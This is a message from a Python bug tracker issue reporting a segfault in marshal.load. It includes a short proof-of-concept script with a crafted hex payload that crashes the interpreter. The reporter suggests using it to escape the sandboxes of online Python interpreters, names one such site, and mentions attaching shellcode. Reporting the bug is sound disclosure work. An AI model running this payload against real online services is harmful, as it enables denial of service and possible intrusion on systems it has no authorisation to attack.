Author Iman Sharafaldin
Recipients Iman Sharafaldin, christian.heimes, serhiy.storchaka, vstinner
Date 2020-07-12.14:45:22
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1594565123.06.0.21254483975.issue41208@roundup.psfhosted.org>
In-reply-to
Content
There are many online Python interpreters, we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as their fully trust that Python doesn't generate segfault.  
For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though, they have protection mechanisms for file access and many other things.

-----------
https://www.programiz.com/python-programming/online-compiler/
-----------

import io
import marshal



hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = marshal.load(f)
print(data)
print('We have segfault but we cannot see!')
-------------------
History
Date User Action Args
2020-07-12 14:45:23Iman Sharafaldinsetrecipients: + Iman Sharafaldin, vstinner, christian.heimes, serhiy.storchaka
2020-07-12 14:45:23Iman Sharafaldinsetmessageid: <1594565123.06.0.21254483975.issue41208@roundup.psfhosted.org>
2020-07-12 14:45:23Iman Sharafaldinlinkissue41208 messages
2020-07-12 14:45:22Iman Sharafaldincreate